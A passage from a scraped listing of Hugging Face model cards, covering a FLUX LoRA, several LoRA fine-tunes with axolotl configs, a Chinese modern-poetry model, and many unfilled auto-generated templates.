Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed] ### Framework versions - PEFT 0.10.0
Varinder2110/3cd637e9-6440-4c4b-a609-02f979efeeb9
Varinder2110
2025-05-30T09:39:25Z
0
0
diffusers
[ "diffusers", "flux", "lora", "replicate", "text-to-image", "en", "base_model:black-forest-labs/FLUX.1-dev", "base_model:adapter:black-forest-labs/FLUX.1-dev", "license:other", "region:us" ]
text-to-image
2025-05-30T08:34:18Z
--- license: other license_name: flux-1-dev-non-commercial-license license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md language: - en tags: - flux - diffusers - lora - replicate base_model: "black-forest-labs/FLUX.1-dev" pipeline_tag: text-to-image # widget: # - text: >- # prompt # output: # url: https://... instance_prompt: TOK --- # 3Cd637E9 6440 4C4B A609 02F979Efeeb9 <Gallery /> ## About this LoRA This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI. It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train ## Trigger words You should use `TOK` to trigger the image generation. ## Run this LoRA with an API using Replicate ```py import replicate input = { "prompt": "TOK", "lora_weights": "https://huggingface.co/Varinder2110/3cd637e9-6440-4c4b-a609-02f979efeeb9/resolve/main/lora.safetensors" } output = replicate.run( "black-forest-labs/flux-dev-lora", input=input ) for index, item in enumerate(output): with open(f"output_{index}.webp", "wb") as file: file.write(item.read()) ``` ## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers) ```py from diffusers import AutoPipelineForText2Image import torch pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda') pipeline.load_lora_weights('Varinder2110/3cd637e9-6440-4c4b-a609-02f979efeeb9', weight_name='lora.safetensors') image = pipeline('TOK').images[0] ``` For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters) ## Training details - Steps: 6000 - Learning rate: 0.0004 - LoRA rank: 16 ## Contribute your own examples You can use the [community tab](https://huggingface.co/Varinder2110/3cd637e9-6440-4c4b-a609-02f979efeeb9/discussions) to add images that show off what you’ve made with this LoRA.
BurgerTruck/mnli-all
BurgerTruck
2025-05-30T09:36:50Z
777
0
transformers
[ "transformers", "safetensors", "bart", "text-classification", "arxiv:1910.09700", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-classification
2025-03-03T09:07:26Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
vermoney/456d65ad-8c97-4337-9868-25d7f6a28e88
vermoney
2025-05-30T09:32:57Z
0
0
peft
[ "peft", "safetensors", "llama", "axolotl", "generated_from_trainer", "base_model:samoline/59b1b15a-698b-4f85-a1f0-ff3f3edf67d9", "base_model:adapter:samoline/59b1b15a-698b-4f85-a1f0-ff3f3edf67d9", "4-bit", "bitsandbytes", "region:us" ]
null
2025-05-30T09:19:42Z
--- library_name: peft base_model: samoline/59b1b15a-698b-4f85-a1f0-ff3f3edf67d9 tags: - axolotl - generated_from_trainer model-index: - name: 456d65ad-8c97-4337-9868-25d7f6a28e88 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> [<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl) <details><summary>See axolotl config</summary> axolotl version: `0.4.1` ```yaml absolute_data_files: false adapter: lora base_model: samoline/59b1b15a-698b-4f85-a1f0-ff3f3edf67d9 bf16: true chat_template: llama3 dataset_prepared_path: /workspace/axolotl datasets: - data_files: - 77e3105900c47af2_train_data.json ds_type: json format: custom path: /workspace/input_data/ type: field_input: input field_instruction: instruct field_output: output format: '{instruction} {input}' no_input_format: '{instruction}' system_format: '{system}' system_prompt: '' debug: null deepspeed: null dpo: beta: 0.1 enabled: true group_by_length: false rank_loss: true reference_model: null early_stopping_patience: null eval_max_new_tokens: 128 eval_table_size: null evals_per_epoch: 1 flash_attention: true fp16: null fsdp: null fsdp_config: null gradient_accumulation_steps: 4 gradient_checkpointing: true gradient_clipping: 0.85 group_by_length: false hub_model_id: vermoney/456d65ad-8c97-4337-9868-25d7f6a28e88 hub_repo: null hub_strategy: end hub_token: null learning_rate: 1.0e-06 load_in_4bit: true load_in_8bit: false local_rank: null logging_steps: 1 lora_alpha: 64 lora_dropout: 0.1 lora_fan_in_fan_out: null lora_model_dir: null lora_r: 32 lora_target_linear: true lr_scheduler: cosine max_steps: 500 micro_batch_size: 6 mixed_precision: bf16 mlflow_experiment_name: /tmp/77e3105900c47af2_train_data.json model_type: AutoModelForCausalLM num_epochs: 2 optimizer: adamw_bnb_8bit output_dir: miner_id_24 pad_to_sequence_len: true resume_from_checkpoint: null s2_attention: null sample_packing: false saves_per_epoch: 1 sequence_len: 1024 strict: false tf32: false tokenizer_type: AutoTokenizer train_on_inputs: false trust_remote_code: true val_set_size: 0.05 wandb_entity: null wandb_mode: online wandb_name: 8602e2e9-5dac-48f0-b259-04275ef943bc wandb_project: s56-7 wandb_run: your_name wandb_runid: 8602e2e9-5dac-48f0-b259-04275ef943bc warmup_steps: 50 weight_decay: 0.05 xformers_attention: true ``` </details><br> # 456d65ad-8c97-4337-9868-25d7f6a28e88 This model is a fine-tuned version of [samoline/59b1b15a-698b-4f85-a1f0-ff3f3edf67d9](https://huggingface.co/samoline/59b1b15a-698b-4f85-a1f0-ff3f3edf67d9) on the None dataset. It achieves the following results on the evaluation set: - Loss: 1.0225 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 1e-06 - train_batch_size: 6 - eval_batch_size: 6 - seed: 42 - gradient_accumulation_steps: 4 - total_train_batch_size: 24 - optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: cosine - lr_scheduler_warmup_steps: 50 - training_steps: 500 ### Training results | Training Loss | Epoch | Step | Validation Loss | |:-------------:|:------:|:----:|:---------------:| | 1.7231 | 0.0003 | 1 | 1.0599 | | 1.3692 | 0.0643 | 250 | 1.0309 | | 1.3028 | 0.1285 | 500 | 1.0225 | ### Framework versions - PEFT 0.13.2 - Transformers 4.46.0 - Pytorch 2.5.0+cu124 - Datasets 3.0.1 - Tokenizers 0.20.1
Hyaline/Zhima-0.5B
Hyaline
2025-05-30T09:32:42Z
0
0
null
[ "safetensors", "qwen2", "license:apache-2.0", "region:us" ]
null
2025-05-30T07:51:54Z
--- license: apache-2.0 --- # 芝麻 Zhima ## 介绍 **芝麻**是一个专注于中文现代诗创作的LLM,能根据用户指令用标题、摘要或关键词生成原创中文现代诗。 芝麻这个名字来源于志摩(徐志摩)的谐音。徐志摩(1897-1931)是一位著名的中国现代诗人。 我们使用[AI-Generated_Chinese_Modern_Poetry](https://huggingface.co/datasets/Hyaline/AI-Generated_Chinese_Modern_Poetry)和[chinese_modern_poetry](https://huggingface.co/datasets/Iess/chinese_modern_poetry)在8张A800上全参数训练了24个小时,基座模型使用[Qwen2.5-0.5B-Instruct](https://huggingface.co/Qwen/Qwen2.5-0.5B-Instruct)。 ## 快速开始 ``` pip install transformers ``` ``` from transformers import AutoModelForCausalLM, AutoTokenizer model_name = "Hyaline/Zhima-0.5B" model = AutoModelForCausalLM.from_pretrained( model_name, torch_dtype="auto", device_map="auto" ) tokenizer = AutoTokenizer.from_pretrained(model_name) prompt = "使用以下标题写一首现代诗:向山谷吹来的风" messages = [ {"role": "user", "content": prompt} ] text = tokenizer.apply_chat_template( messages, tokenize=False, add_generation_prompt=True ) model_inputs = tokenizer([text], return_tensors="pt").to(model.device) generated_ids = model.generate( **model_inputs, max_new_tokens=512 ) generated_ids = [ output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids) ] response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0] print(response) ``` # English ## Introduction **Zhima** is an LLM that focuses on Chinese modern poetry creation and can generate original Chinese modern poems based on user instructions using titles, summaries, or keywords. The name Zhima comes from the homophone of Zhimo (Xu Zhimo). Xu Zhimo (1897-1931) is a famous Chinese modern poet. We use [AI-Generated_Chinese_Modern_Poetry](https://huggingface.co/datasets/Hyaline/AI-Generated_Chinese_Modern_Poetry) and [chinese_modern_poetry](https://huggingface.co/datasets/Iess/chinese_modern_poetry) to conduct full-parameter training for 24 hours on 8 A800 GPUs, with [Qwen2.5-0.5B-Instruct](https://huggingface.co/Qwen/Qwen2.5-0.5B-Instruct) as the base model. ## Quick Start ``` pip install transformers ``` ``` from transformers import AutoModelForCausalLM, AutoTokenizer model_name = "Hyaline/Zhima-0.5B" model = AutoModelForCausalLM.from_pretrained( model_name, torch_dtype="auto", device_map="auto" ) tokenizer = AutoTokenizer.from_pretrained(model_name) prompt = "使用以下标题写一首现代诗:向山谷吹来的风" messages = [ {"role": "user", "content": prompt} ] text = tokenizer.apply_chat_template( messages, tokenize=False, add_generation_prompt=True ) model_inputs = tokenizer([text], return_tensors="pt").to(model.device) generated_ids = model.generate( **model_inputs, max_new_tokens=512 ) generated_ids = [ output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids) ] response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0] print(response) ```
Tandogan/dpo_v3_alpaca_on_base_big
Tandogan
2025-05-30T09:31:22Z
0
0
transformers
[ "transformers", "safetensors", "qwen3", "text-generation", "arxiv:1910.09700", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T09:30:18Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
teachyouusedicksuck3dayearn1wan/Qwen2.5-3B-GRPO-medical-reasoning-VLLM
teachyouusedicksuck3dayearn1wan
2025-05-30T09:30:08Z
0
0
transformers
[ "transformers", "pytorch", "qwen2", "text-generation", "text-generation-inference", "unsloth", "trl", "conversational", "en", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T09:27:43Z
--- base_model: unsloth/qwen2.5-3b-instruct-unsloth-bnb-4bit tags: - text-generation-inference - transformers - unsloth - qwen2 - trl license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** teachyouusedicksuck3dayearn1wan - **License:** apache-2.0 - **Finetuned from model :** unsloth/qwen2.5-3b-instruct-unsloth-bnb-4bit This qwen2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
MaestrAI/camelia_wright-lora-1748597293
MaestrAI
2025-05-30T09:28:15Z
0
0
null
[ "region:us" ]
null
2025-05-30T09:28:14Z
# camelia_wright LORA Model This is a LORA model for character Camelia Wright Created at 2025-05-30 11:28:15
dimasik87/bee073bf-1eec-4512-b15b-ea5e13c9d7f1
dimasik87
2025-05-30T09:24:17Z
0
0
peft
[ "peft", "safetensors", "qwen2", "axolotl", "generated_from_trainer", "base_model:unsloth/Qwen2-1.5B-Instruct", "base_model:adapter:unsloth/Qwen2-1.5B-Instruct", "license:apache-2.0", "4-bit", "bitsandbytes", "region:us" ]
null
2025-05-30T08:25:24Z
--- library_name: peft license: apache-2.0 base_model: unsloth/Qwen2-1.5B-Instruct tags: - axolotl - generated_from_trainer model-index: - name: bee073bf-1eec-4512-b15b-ea5e13c9d7f1 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> [<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl) <details><summary>See axolotl config</summary> axolotl version: `0.4.1` ```yaml absolute_data_files: false adapter: lora base_model: unsloth/Qwen2-1.5B-Instruct bf16: true chat_template: llama3 dataset_prepared_path: /workspace/axolotl datasets: - data_files: - 03542368294c05c0_train_data.json ds_type: json format: custom path: /workspace/input_data/ type: field_instruction: instruct field_output: output format: '{instruction}' no_input_format: '{instruction}' system_format: '{system}' system_prompt: '' debug: null deepspeed: null dpo: beta: 0.1 enabled: true group_by_length: false rank_loss: true reference_model: null early_stopping_patience: null eval_max_new_tokens: 128 eval_table_size: null evals_per_epoch: 1 flash_attention: true fp16: null fsdp: null fsdp_config: null gradient_accumulation_steps: 4 gradient_checkpointing: true gradient_clipping: 0.85 group_by_length: false hub_model_id: dimasik87/bee073bf-1eec-4512-b15b-ea5e13c9d7f1 hub_repo: null hub_strategy: end hub_token: null learning_rate: 1.0e-06 load_in_4bit: true load_in_8bit: false local_rank: null logging_steps: 1 lora_alpha: 64 lora_dropout: 0.1 lora_fan_in_fan_out: null lora_model_dir: null lora_r: 32 lora_target_linear: true lr_scheduler: cosine max_steps: 500 micro_batch_size: 6 mixed_precision: bf16 mlflow_experiment_name: /tmp/03542368294c05c0_train_data.json model_type: AutoModelForCausalLM num_epochs: 2 optimizer: adamw_bnb_8bit output_dir: miner_id_24 pad_to_sequence_len: true resume_from_checkpoint: null s2_attention: null sample_packing: false saves_per_epoch: 1 sequence_len: 1024 strict: false tf32: false tokenizer_type: AutoTokenizer train_on_inputs: false trust_remote_code: true val_set_size: 0.05 wandb_entity: null wandb_mode: online wandb_name: 43e1f9fe-da21-41e2-ae9d-431b9ab608ef wandb_project: s56-7 wandb_run: your_name wandb_runid: 43e1f9fe-da21-41e2-ae9d-431b9ab608ef warmup_steps: 50 weight_decay: 0.05 xformers_attention: true ``` </details><br> # bee073bf-1eec-4512-b15b-ea5e13c9d7f1 This model is a fine-tuned version of [unsloth/Qwen2-1.5B-Instruct](https://huggingface.co/unsloth/Qwen2-1.5B-Instruct) on the None dataset. It achieves the following results on the evaluation set: - Loss: 1.9160 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 1e-06 - train_batch_size: 6 - eval_batch_size: 6 - seed: 42 - gradient_accumulation_steps: 4 - total_train_batch_size: 24 - optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: cosine - lr_scheduler_warmup_steps: 50 - training_steps: 500 ### Training results | Training Loss | Epoch | Step | Validation Loss | |:-------------:|:------:|:----:|:---------------:| | 1.9601 | 0.0000 | 1 | 1.9706 | | 2.0692 | 0.0101 | 250 | 1.9317 | | 1.9941 | 0.0203 | 500 | 1.9160 | ### Framework versions - PEFT 0.13.2 - Transformers 4.46.0 - Pytorch 2.5.0+cu124 - Datasets 3.0.1 - Tokenizers 0.20.1
dimasik2987/19d7a71a-8226-44a0-a662-51de454691c5
dimasik2987
2025-05-30T09:20:13Z
0
0
peft
[ "peft", "safetensors", "qwen2", "axolotl", "generated_from_trainer", "base_model:unsloth/Qwen2-1.5B-Instruct", "base_model:adapter:unsloth/Qwen2-1.5B-Instruct", "license:apache-2.0", "4-bit", "bitsandbytes", "region:us" ]
null
2025-05-30T08:25:24Z
--- library_name: peft license: apache-2.0 base_model: unsloth/Qwen2-1.5B-Instruct tags: - axolotl - generated_from_trainer model-index: - name: 19d7a71a-8226-44a0-a662-51de454691c5 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> [<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl) <details><summary>See axolotl config</summary> axolotl version: `0.4.1` ```yaml absolute_data_files: false adapter: lora base_model: unsloth/Qwen2-1.5B-Instruct bf16: true chat_template: llama3 dataset_prepared_path: /workspace/axolotl datasets: - data_files: - 03542368294c05c0_train_data.json ds_type: json format: custom path: /workspace/input_data/ type: field_instruction: instruct field_output: output format: '{instruction}' no_input_format: '{instruction}' system_format: '{system}' system_prompt: '' debug: null deepspeed: null dpo: beta: 0.1 enabled: true group_by_length: false rank_loss: true reference_model: null early_stopping_patience: null eval_max_new_tokens: 128 eval_table_size: null evals_per_epoch: 1 flash_attention: true fp16: null fsdp: null fsdp_config: null gradient_accumulation_steps: 2 gradient_checkpointing: true gradient_clipping: 0.85 group_by_length: false hub_model_id: dimasik2987/19d7a71a-8226-44a0-a662-51de454691c5 hub_repo: null hub_strategy: end hub_token: null learning_rate: 5.0e-06 load_in_4bit: true load_in_8bit: false local_rank: null logging_steps: 1 lora_alpha: 128 lora_dropout: 0.1 lora_fan_in_fan_out: null lora_model_dir: null lora_r: 64 lora_target_linear: true lr_scheduler: cosine max_steps: 500 micro_batch_size: 12 mixed_precision: bf16 mlflow_experiment_name: /tmp/03542368294c05c0_train_data.json model_type: AutoModelForCausalLM num_epochs: 2 optimizer: adamw_bnb_8bit output_dir: miner_id_24 pad_to_sequence_len: true resume_from_checkpoint: null s2_attention: null sample_packing: false saves_per_epoch: 1 sequence_len: 1024 strict: false tf32: false tokenizer_type: AutoTokenizer train_on_inputs: false trust_remote_code: true val_set_size: 0.05 wandb_entity: null wandb_mode: online wandb_name: 43e1f9fe-da21-41e2-ae9d-431b9ab608ef wandb_project: s56-7 wandb_run: your_name wandb_runid: 43e1f9fe-da21-41e2-ae9d-431b9ab608ef warmup_steps: 50 weight_decay: 0.02 xformers_attention: true ``` </details><br> # 19d7a71a-8226-44a0-a662-51de454691c5 This model is a fine-tuned version of [unsloth/Qwen2-1.5B-Instruct](https://huggingface.co/unsloth/Qwen2-1.5B-Instruct) on the None dataset. It achieves the following results on the evaluation set: - Loss: 1.6933 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 5e-06 - train_batch_size: 12 - eval_batch_size: 12 - seed: 42 - gradient_accumulation_steps: 2 - total_train_batch_size: 24 - optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: cosine - lr_scheduler_warmup_steps: 50 - training_steps: 500 ### Training results | Training Loss | Epoch | Step | Validation Loss | |:-------------:|:------:|:----:|:---------------:| | 1.9603 | 0.0000 | 1 | 1.9165 | | 1.8663 | 0.0101 | 250 | 1.7078 | | 1.7963 | 0.0203 | 500 | 1.6933 | ### Framework versions - PEFT 0.13.2 - Transformers 4.46.0 - Pytorch 2.5.0+cu124 - Datasets 3.0.1 - Tokenizers 0.20.1
Manucn10/kaggle-v4
Manucn10
2025-05-30T09:19:28Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-05-30T09:19:12Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation 